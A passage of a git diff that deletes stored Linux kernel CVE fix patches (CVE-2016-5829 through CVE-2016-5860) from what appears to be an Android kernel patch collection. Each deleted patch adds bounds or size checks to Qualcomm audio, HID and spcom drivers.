-+ prandom_u32_max(sysctl_tcp_challenge_ack_limit));
- }
-- if (++challenge_count <= sysctl_tcp_challenge_ack_limit) {
-+ count = READ_ONCE(challenge_count);
-+ if (count > 0) {
-+ WRITE_ONCE(challenge_count, count - 1);
- NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPCHALLENGEACK);
- tcp_send_ack(sk);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch
deleted file mode 100644
index 27ecb6a7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5829/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From af37375834fe1dd7a7a08c6042664ffc2a1a3beb Mon Sep 17 00:00:00 2001
-From: Sriharsha Allenki
-Date: Thu, 22 Dec 2016 14:57:44 +0530
-Subject: hid: usbhid: Changes to prevent buffer overflow
-
-Moved some value checks to right positions to prevent
-buffer flow, which may be possible before. Previously
-these value checks are in an else statement which may
-not be executed.
-
-Change-Id: I02dbecd074183581a6bdae6377097bc004bd3d3c
-CRs-fixed: 1102936
-Signed-off-by: Sriharsha Allenki
----
- drivers/hid/usbhid/hiddev.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-(limited to 'drivers/hid/usbhid/hiddev.c')
-
-diff --git a/drivers/hid/usbhid/hiddev.c b/drivers/hid/usbhid/hiddev.c
-index 2f1ddca..602f163 100644
---- a/drivers/hid/usbhid/hiddev.c
-+++ b/drivers/hid/usbhid/hiddev.c
-@@ -510,18 +510,19 @@ static noinline int hiddev_ioctl_usage(struct hiddev *hiddev, unsigned int cmd,
- goto inval;
-
- field = report->field[uref->field_index];
-+ }
-
-- if (cmd == HIDIOCGCOLLECTIONINDEX) {
-- if (uref->usage_index >= field->maxusage)
-- goto inval;
-- } else if (uref->usage_index >= field->report_count)
-+ if (cmd == HIDIOCGCOLLECTIONINDEX) {
-+ if (uref->usage_index >= field->maxusage)
- goto inval;
-+ } else if (uref->usage_index >= field->report_count)
-+ goto inval;
-
-- else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-- (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-- uref->usage_index + uref_multi->num_values > field->report_count))
-- goto inval;
-- }
-+ else if ((cmd == HIDIOCGUSAGES || cmd == HIDIOCSUSAGES) &&
-+ (uref_multi->num_values > HID_MAX_MULTI_USAGES ||
-+ uref->usage_index + uref_multi->num_values >
-+ field->report_count))
-+ goto inval;
-
- switch (cmd) {
- case HIDIOCGUSAGE:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch
deleted file mode 100644
index 5a346499..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/3.10/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From e879fc7eca7e3ba0ab9dcf24d2f717e49718a01e Mon Sep 17 00:00:00 2001
-From: kunleiz
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure valid length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 59835e6..d654b30 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1656,6 +1656,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- ret = 0;
- dolby_data->length = 0;
- pr_err("%s Incorrect VCNB length", __func__);
-+ return -EINVAL;
- }
-
- params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch
deleted file mode 100644
index aa063c79..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/3.18/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 49d27afe9a76273e0d5314cf9241d1d1c3561d13 Mon Sep 17 00:00:00 2001
-From: kunleiz
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure valid length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 59835e6..d654b30 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1656,6 +1656,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- ret = 0;
- dolby_data->length = 0;
- pr_err("%s Incorrect VCNB length", __func__);
-+ return -EINVAL;
- }
-
- params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch
deleted file mode 100644
index 633b04f9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5853/4.4/0003.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a8f3b894de319718aecfc2ce9c691514696805be Mon Sep 17 00:00:00 2001
-From: kunleiz
-Date: Tue, 27 Dec 2016 16:15:51 +0800
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-Return an error code to ensure length value is valid.
-
-CRs-fixed: 1102987
-Change-Id: I6a679d08342d1da58c20b5c3d4e436dd335764ae
-Signed-off-by: kunleiz
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 2441cab..ca6f70f 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -1642,6 +1642,7 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- ret = 0;
- dolby_data->length = 0;
- pr_err("%s Incorrect VCNB length", __func__);
-+ return -EINVAL;
- }
-
- params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch
deleted file mode 100644
index 959b62e3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5854/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 28d23d4d7999f683b27b6e0c489635265b67a4c9 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov
-Date: Sat, 26 Nov 2016 18:44:06 +0200
-Subject: spcom: check size before calling copy_to_user()
-
-Calling copy_to_user(to, from, size) with negative value
-might cause heap overflow since size is unsigned parameter
-and negative value is cast to big unsigned value.
-
-CRs-Fixed: 1092683
-Change-Id: I9b4a0710aa33942de2976f7ee158a8025dd6a20e
-Signed-off-by: Amir Samuelov
----
- drivers/soc/qcom/spcom.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index fcdcf0b..7cb538b 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -2125,6 +2125,11 @@ static ssize_t spcom_device_read(struct file *filp, char __user *user_buff,
- return -ENOMEM;
-
- actual_size = spcom_handle_read(ch, buf, size);
-+ if ((actual_size <= 0) || (actual_size > size)) {
-+ pr_err("invalid actual_size [%d].\n", actual_size);
-+ kfree(buf);
-+ return -EFAULT;
-+ }
-
- ret = copy_to_user(user_buff, buf, actual_size);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch
deleted file mode 100644
index 5f744ed8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5855/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From a5edb54e93ba85719091fe2bc426d75fa7059834 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov
-Date: Tue, 29 Nov 2016 10:58:54 +0200
-Subject: spcom: check user space command size
-
-The user space spcomlib provides command buffer
-for various commands.
-Verify that the command buffer size matches the expected
-command struct size.
-
-CRs-Fixed: 1094143
-Change-Id: If3ead54bd03368fa9338921e299b2ad8fb078297
-Signed-off-by: Amir Samuelov
----
- drivers/soc/qcom/spcom.c | 13 ++++++++++++-
- 1 file changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..ebb6b13 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1539,13 +1539,18 @@ static int spcom_handle_lock_ion_buf_command(struct spcom_channel *ch,
- struct ion_handle *ion_handle;
- int i;
-
-+ if (size != sizeof(*cmd)) {
-+ pr_err("cmd size [%d] , expected [%d].\n",
-+ (int) size, (int) sizeof(*cmd));
-+ return -EINVAL;
-+ }
-+
- /* Check ION client */
- if (spcom_dev->ion_client == NULL) {
- pr_err("invalid ion client.\n");
- return -ENODEV;
- }
-
--
- /* Get ION handle from fd - this increments the ref count */
- ion_handle = ion_import_dma_buf(spcom_dev->ion_client, fd);
- if (ion_handle == NULL) {
-@@ -1591,6 +1596,12 @@ static int spcom_handle_unlock_ion_buf_command(struct spcom_channel *ch,
- struct ion_client *ion_client = spcom_dev->ion_client;
- int i;
-
-+ if (size != sizeof(*cmd)) {
-+ pr_err("cmd size [%d] , expected [%d].\n",
-+ (int) size, (int) sizeof(*cmd));
-+ return -EINVAL;
-+ }
-+
- /* Check ION client */
- if (ion_client == NULL) {
- pr_err("fail to create ion client.\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch
deleted file mode 100644
index 0a7dd488..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5856/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 0c0622914ba53cdcb6e79e85f64bfdf7762c0368 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov
-Date: Tue, 6 Dec 2016 16:42:14 +0200
-Subject: spcom: check buf_size validity for user send command
-
-Check command buf size before allocating kernel buffer.
-
-CRs-Fixed: 1094078
-Change-Id: Ib03cd8c79966ff35863c1bde99089cac018ab45c
-Signed-off-by: Amir Samuelov
----
- drivers/soc/qcom/spcom.c | 22 ++++++++++++++++++++++
- 1 file changed, 22 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..19388f1 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1333,6 +1333,16 @@ static int spcom_handle_send_command(struct spcom_channel *ch,
-
- pr_debug("send req/resp ch [%s] size [%d] .\n", ch->name, size);
-
-+ /*
-+ * check that cmd buf size is at least struct size,
-+ * to allow access to struct fields.
-+ */
-+ if (size < sizeof(*cmd)) {
-+ pr_err("ch [%s] invalid cmd buf.\n",
-+ ch->name);
-+ return -EINVAL;
-+ }
-+
- /* Check if remote side connect */
- if (!spcom_is_channel_connected(ch)) {
- pr_err("ch [%s] remote side not connect.\n", ch->name);
-@@ -1344,6 +1354,18 @@ static int spcom_handle_send_command(struct spcom_channel *ch,
- buf_size = cmd->buf_size;
- timeout_msec = cmd->timeout_msec;
-
-+ /* Check param validity */
-+ if (buf_size > SPCOM_MAX_RESPONSE_SIZE) {
-+ pr_err("ch [%s] invalid buf size [%d].\n",
-+ ch->name, buf_size);
-+ return -EINVAL;
-+ }
-+ if (size != sizeof(*cmd) + buf_size) {
-+ pr_err("ch [%s] invalid cmd size [%d].\n",
-+ ch->name, size);
-+ return -EINVAL;
-+ }
-+
- /* Allocate Buffers*/
- tx_buf_size = sizeof(*hdr) + buf_size;
- tx_buf = kzalloc(tx_buf_size, GFP_KERNEL);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch
deleted file mode 100644
index 1022f527..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5857/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From d9d2c405d46ca27b25ed55a8dbd02bd1e633e2d5 Mon Sep 17 00:00:00 2001
-From: Amir Samuelov
-Date: Tue, 6 Dec 2016 18:18:16 +0200
-Subject: spcom: check buf size for send modified command
-
-Check buffer size validity before allocating kernel buffer.
-
-CRs-Fixed: 1094140
-Change-Id: I8c280b60f316d7bae87644104d18aa7df4af9efe
-Signed-off-by: Amir Samuelov
----
- drivers/soc/qcom/spcom.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
-
-diff --git a/drivers/soc/qcom/spcom.c b/drivers/soc/qcom/spcom.c
-index 0c5f3b8..48f1157 100644
---- a/drivers/soc/qcom/spcom.c
-+++ b/drivers/soc/qcom/spcom.c
-@@ -1407,6 +1407,11 @@ static int modify_ion_addr(void *buf,
- return -ENODEV;
- }
-
-+ if (buf_size < sizeof(uint64_t)) {
-+ pr_err("buf size too small [%d].\n", buf_size);
-+ return -ENODEV;
-+ }
-+
- if (buf_offset > buf_size - sizeof(uint64_t)) {
- pr_err("invalid buf_offset [%d].\n", buf_offset);
- return -ENODEV;
-@@ -1469,6 +1474,16 @@ static int spcom_handle_send_modified_command(struct spcom_channel *ch,
-
- pr_debug("send req/resp ch [%s] size [%d] .\n", ch->name, size);
-
-+ /*
-+ * check that cmd buf size is at least struct size,
-+ * to allow access to struct fields.
-+ */
-+ if (size < sizeof(*cmd)) {
-+ pr_err("ch [%s] invalid cmd buf.\n",
-+ ch->name);
-+ return -EINVAL;
-+ }
-+
- /* Check if remote side connect */
- if (!spcom_is_channel_connected(ch)) {
- pr_err("ch [%s] remote side not connect.\n", ch->name);
-@@ -1481,6 +1496,18 @@ static int spcom_handle_send_modified_command(struct spcom_channel *ch,
- timeout_msec = cmd->timeout_msec;
- memcpy(ion_info, cmd->ion_info, sizeof(ion_info));
-
-+ /* Check param validity */
-+ if (buf_size > SPCOM_MAX_RESPONSE_SIZE) {
-+ pr_err("ch [%s] invalid buf size [%d].\n",
-+ ch->name, buf_size);
-+ return -EINVAL;
-+ }
-+ if (size != sizeof(*cmd) + buf_size) {
-+ pr_err("ch [%s] invalid cmd size [%d].\n",
-+ ch->name, size);
-+ return -EINVAL;
-+ }
-+
- /* Allocate Buffers*/
- tx_buf_size = sizeof(*hdr) + buf_size;
- tx_buf = kzalloc(tx_buf_size, GFP_KERNEL);
-@@ -1746,6 +1773,13 @@ static int spcom_handle_read_req_resp(struct spcom_channel *ch,
- return -ENOTCONN;
- }
-
-+ /* Check param validity */
-+ if (size > SPCOM_MAX_RESPONSE_SIZE) {
-+ pr_err("ch [%s] inavlid size [%d].\n",
-+ ch->name, size);
-+ return -EINVAL;
-+ }
-+
- /* Allocate Buffers*/
- rx_buf_size = sizeof(*hdr) + size;
- rx_buf = kzalloc(rx_buf_size, GFP_KERNEL);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch
deleted file mode 100644
index d2eacb6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 3154eb1d263b9c3eab2c9fa8ebe498390bf5d711 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani
-Date: Wed, 7 Dec 2016 18:19:31 -0800
-Subject: ASoC: wcd9320: Fix out of bounds for mad input value
-
-Add check in taiko_mad_input_put function to
-return error on out of bounds access using
-mad input value
-
-CRs-fixed: 1096799
-Change-Id: I75ce9e881cf05a50e874a555b2f8bd3286cdaed4
-Signed-off-by: Karthikeyan Mani
----
- sound/soc/codecs/wcd9320.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9320.c b/sound/soc/codecs/wcd9320.c
-index cb91030..ff199c14e 100644
---- a/sound/soc/codecs/wcd9320.c
-+++ b/sound/soc/codecs/wcd9320.c
-@@ -1208,6 +1208,14 @@ static int taiko_mad_input_put(struct snd_kcontrol *kcontrol,
-
- taiko_mad_input = ucontrol->value.integer.value[0];
-
-+ if (taiko_mad_input >= ARRAY_SIZE(taiko_conn_mad_text)) {
-+ dev_err(codec->dev,
-+ "%s: taiko_mad_input = %d out of bounds\n",
-+ __func__, taiko_mad_input);
-+ return -EINVAL;
-+ }
-+
-+
- micb_4_int_reg = taiko->resmgr.reg_addr->micb_4_int_rbias;
- pr_debug("%s: taiko_mad_input = %s\n", __func__,
- taiko_conn_mad_text[taiko_mad_input]);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch
deleted file mode 100644
index c7cbeb9e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From afc5bea71bc8f251dad1104568383019f4923af6 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani
-Date: Wed, 14 Dec 2016 11:33:18 -0800
-Subject: ASoC: wcd9330: Fix out of bounds for mad input value
-
-Add check in tomtom_mad_input_put function to
-return error on out of bounds access using
-mad input value
-
-CRs-fixed: 1096799
-Change-Id: I16f8627b29c7b14a8dc0433b21aa21bf96e98905
-Signed-off-by: Karthikeyan Mani
----
- sound/soc/codecs/wcd9330.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9330.c b/sound/soc/codecs/wcd9330.c
-index 22f3f85..7fb1096 100644
---- a/sound/soc/codecs/wcd9330.c
-+++ b/sound/soc/codecs/wcd9330.c
-@@ -1377,6 +1377,13 @@ static int tomtom_mad_input_put(struct snd_kcontrol *kcontrol,
- tomtom_mad_input = ucontrol->value.integer.value[0];
- micb_4_int_reg = tomtom->resmgr.reg_addr->micb_4_int_rbias;
-
-+ if (tomtom_mad_input >= ARRAY_SIZE(tomtom_conn_mad_text)) {
-+ dev_err(codec->dev,
-+ "%s: tomtom_mad_input = %d out of bounds\n",
-+ __func__, tomtom_mad_input);
-+ return -EINVAL;
-+ }
-+
- pr_debug("%s: tomtom_mad_input = %s\n", __func__,
- tomtom_conn_mad_text[tomtom_mad_input]);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch
deleted file mode 100644
index bd6cb256..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5858/ANY/0003.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 3bfe5a89916f7d29492e9f6d941d108b688cb804 Mon Sep 17 00:00:00 2001
-From: Karthikeyan Mani
-Date: Wed, 14 Dec 2016 11:46:35 -0800
-Subject: ASoC: wcd9335: Fix out of bounds for mad input value
-
-Add check in tasha_mad_input_put function to
-return error on out of bounds access using
-mad input value.
-
-CRs-fixed: 1096799
-Change-Id: Iddaa3fef362f7cb1919aa3bd8dd4b83133fe7c97
-Signed-off-by: Karthikeyan Mani
----
- sound/soc/codecs/wcd9335.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/codecs/wcd9335.c b/sound/soc/codecs/wcd9335.c
-index c94623c..1f97326 100644
---- a/sound/soc/codecs/wcd9335.c
-+++ b/sound/soc/codecs/wcd9335.c
-@@ -7575,6 +7575,13 @@ static int tasha_mad_input_put(struct snd_kcontrol *kcontrol,
-
- tasha_mad_input = ucontrol->value.integer.value[0];
-
-+ if (tasha_mad_input >= ARRAY_SIZE(tasha_conn_mad_text)) {
-+ dev_err(codec->dev,
-+ "%s: tasha_mad_input = %d out of bounds\n",
-+ __func__, tasha_mad_input);
-+ return -EINVAL;
-+ }
-+
- if (!strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED1") ||
- !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED2") ||
- !strcmp(tasha_conn_mad_text[tasha_mad_input], "NOTUSED3") ||
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch
deleted file mode 100644
index 81b2bac5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5859/3.10/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 302b5348ecbba8cf032a9ffaaa63222a2b285d89 Mon Sep 17 00:00:00 2001
-From: Sharad Sangle
-Date: Tue, 13 Dec 2016 14:35:39 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-fixed: 1096672
-Change-Id: I224bc2f20d94182713c565972fb0bd52cad6f3fd
-Signed-off-by: Sharad Sangle
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..5866e46 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -18,6 +18,10 @@
-
- #include "msm-dolby-dap-config.h"
-
-+#ifndef DOLBY_PARAM_VCNB_MAX_LENGTH
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH 40
-+#endif
-+
- /* dolby endp based parameters */
- struct dolby_dap_endp_params_s {
- int device;
-@@ -896,6 +900,11 @@ int msm_dolby_dap_param_visualizer_control_get(struct snd_kcontrol *kcontrol,
- uint32_t param_payload_len =
- DOLBY_PARAM_PAYLOAD_SIZE * sizeof(uint32_t);
- int port_id, copp_idx, idx;
-+ if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+ pr_err("%s Incorrect VCNB length", __func__);
-+ ucontrol->value.integer.value[0] = 0;
-+ return -EINVAL;
-+ }
- for (idx = 0; idx < AFE_MAX_PORTS; idx++) {
- port_id = dolby_dap_params_states.port_id[idx];
- copp_idx = dolby_dap_params_states.copp_idx[idx];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch
deleted file mode 100644
index cc19637b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5859/3.18/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 97fdb441a9fb330a76245e473bc1a2155c809ebe Mon Sep 17 00:00:00 2001
-From: Sharad Sangle
-Date: Tue, 13 Dec 2016 14:35:39 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-fixed: 1096672
-Change-Id: I224bc2f20d94182713c565972fb0bd52cad6f3fd
-Signed-off-by: Sharad Sangle
----
- sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c | 11 ++++++++++-
- 1 file changed, 10 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-index bb0f890..5866e46 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-dap-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016, The Linux Foundation. All rights reserved.
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
- * only version 2 as published by the Free Software Foundation.
-@@ -18,6 +18,10 @@
-
- #include "msm-dolby-dap-config.h"
-
-+#ifndef DOLBY_PARAM_VCNB_MAX_LENGTH
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH 40
-+#endif
-+
- /* dolby endp based parameters */
- struct dolby_dap_endp_params_s {
- int device;
-@@ -896,6 +900,11 @@ int msm_dolby_dap_param_visualizer_control_get(struct snd_kcontrol *kcontrol,
- uint32_t param_payload_len =
- DOLBY_PARAM_PAYLOAD_SIZE * sizeof(uint32_t);
- int port_id, copp_idx, idx;
-+ if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+ pr_err("%s Incorrect VCNB length", __func__);
-+ ucontrol->value.integer.value[0] = 0;
-+ return -EINVAL;
-+ }
- for (idx = 0; idx < AFE_MAX_PORTS; idx++) {
- port_id = dolby_dap_params_states.port_id[idx];
- copp_idx = dolby_dap_params_states.copp_idx[idx];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch
deleted file mode 100644
index 40111085..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/3.10/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 25ab82f5d7d8d8d3b4c8eaaa02944dd5a81be7c3 Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index d5b675f..a4daf91d 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1913,6 +1913,13 @@ static int msm_cpe_lsm_reg_model(struct snd_pcm_substream *substream,
-
- lsm_ops->lsm_get_snd_model_offset(cpe->core_handle,
- session, &offset);
-+ /* Check if 'p_info->param_size + offset' crosses U32_MAX. */
-+ if (p_info->param_size > U32_MAX - offset) {
-+ dev_err(rtd->dev,
-+ "%s: Invalid param_size %d\n",
-+ __func__, p_info->param_size);
-+ return -EINVAL;
-+ }
- session->snd_model_size = p_info->param_size + offset;
-
- session->snd_model_data = vzalloc(session->snd_model_size);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch
deleted file mode 100644
index 5b3d26f9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5860/3.18/0002.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 9bcf048a7d1a8a0511feb39d6d3111044e6278ec Mon Sep 17 00:00:00 2001
-From: Karthik Reddy Katta
-Date: Wed, 28 Dec 2016 11:24:33 +0530
-Subject: drivers: soc: qcom: Add overflow check for sound model size
-
-Overflow check is added for sound model size to prevent
-heap overflow while allocating memory for sound model data.
-
-CRs-Fixed: 1100682
-Change-Id: Id38523a5e79028c692670e84d5fe924a855a5a10
-Signed-off-by: Karthik Reddy Katta
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
